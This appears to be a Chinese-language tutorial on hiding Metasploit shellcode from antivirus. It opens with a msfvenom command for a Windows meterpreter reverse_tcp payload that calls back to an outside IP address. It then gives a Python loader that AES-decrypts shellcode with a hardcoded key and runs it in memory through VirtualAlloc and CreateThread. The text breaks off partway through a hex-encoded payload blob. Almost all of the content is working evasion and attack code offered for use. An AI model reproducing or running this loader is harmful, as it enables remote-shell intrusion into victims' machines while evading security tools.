目录
MSF
msf生成的shellcode采用base64编码
msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhost=47.94.236.117 lport=6688-f c
脚本里面内置的AES和加密函数
encrypt加密
decrypt解密
两个脚本:一个脚本加密,加密的东西另外一个脚本解密调用执行
1.py
from Crypto.Cipher import AES
from binascii import b2a_hex, a2b_hex
import ctypes,base64
# 如果text不足16位的倍数就用空格补足为16位
def add_to_16(text):
if len(text.encode('utf-8')) % 16:
add = 16 - (len(text.encode('utf-8')) % 16)
else:
add = 0
text = text + ('\0' * add)
return text.encode('utf-8')
# 加密函数
def encrypt(text):
key = '9999999999999999'.encode('utf-8')
mode = AES.MODE_CBC
iv = b'qqqqqqqqqqqqqqqq'
text = add_to_16(text)
cryptos = AES.new(key, mode, iv)
cipher_text = cryptos.encrypt(text)
#print(base64.b64decode(cipher_text))
# 因为AES加密后的字符串不一定是ascii字符集的,输出保存可能存在问题,所以这里转为16进制字符串
return b2a_hex(cipher_text)
# 解密后,去掉补足的空格用strip() 去掉,注意此时不需要解密函数,可以去掉
def decrypt(text):
key = '9999999999999999'.encode('utf-8')
iv = b'qqqqqqqqqqqqqqqq'
mode = AES.MODE_CBC
cryptos = AES.new(key, mode, iv)
plain_text = cryptos.decrypt(a2b_hex(text))
shellcode=bytes.decode(plain_text).rstrip('\0')
return shellcode
def zhixing(shellcode):
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
if __name__ == '__main__':
#对payload进行base64加密
#msf
s = '''
\x2f\x45\x69\x44\x35\x50\x44\x6f\x7a\x41\x41\x41\x41\x45
\x46\x52\x51\x56\x42\x53\x53\x44\x48\x53\x5a\x55\x69\x4c
\x55\x6d\x42\x49\x69\x31\x49\x59\x55\x56\x5a\x49\x69\x31
\x49\x67\x54\x54\x48\x4a\x53\x41\x2b\x33\x53\x6b\x70\x49
\x69\x33\x4a\x51\x53\x44\x48\x41\x72\x44\x78\x68\x66\x41
\x49\x73\x49\x45\x48\x42\x79\x51\x31\x42\x41\x63\x48\x69
\x37\x56\x4a\x42\x55\x55\x69\x4c\x55\x69\x43\x4c\x51\x6a
\x78\x49\x41\x64\x42\x6d\x67\x58\x67\x59\x43\x77\x49\x50
\x68\x58\x49\x41\x41\x41\x43\x4c\x67\x49\x67\x41\x41\x41
\x42\x49\x68\x63\x42\x30\x5a\x30\x67\x42\x30\x49\x74\x49
\x47\x45\x53\x4c\x51\x43\x42\x4a\x41\x64\x42\x51\x34\x31
\x5a\x49\x2f\x38\x6c\x4e\x4d\x63\x6c\x42\x69\x7a\x53\x49
\x53\x41\x48\x57\x53\x44\x48\x41\x72\x45\x48\x42\x79\x51
\x31\x42\x41\x63\x45\x34\x34\x48\x58\x78\x54\x41\x4e\x4d
\x4a\x41\x68\x46\x4f\x64\x46\x31\x32\x46\x68\x45\x69\x30
\x41\x6b\x53\x51\x48\x51\x5a\x6b\x47\x4c\x44\x45\x68\x45
\x69\x30\x41\x63\x53\x51\x48\x51\x51\x59\x73\x45\x69\x45
\x67\x42\x30\x45\x46\x59\x51\x56\x68\x65\x57\x56\x70\x42
\x57\x45\x46\x5a\x51\x56\x70\x49\x67\x2b\x77\x67\x51\x56
\x4c\x2f\x34\x46\x68\x42\x57\x56\x70\x49\x69\x78\x4c\x70
\x53\x2f\x2f\x2f\x2f\x31\x31\x4a\x76\x6e\x64\x7a\x4d\x6c
\x38\x7a\x4d\x67\x41\x41\x51\x56\x5a\x4a\x69\x65\x5a\x49
\x67\x65\x79\x67\x41\x51\x41\x41\x53\x59\x6e\x6c\x53\x62
\x77\x43\x41\x42\x6f\x67\x77\x4b\x67\x54\x6c\x6b\x46\x55
\x53\x59\x6e\x6b\x54\x49\x6e\x78\x51\x62\x70\x4d\x64\x79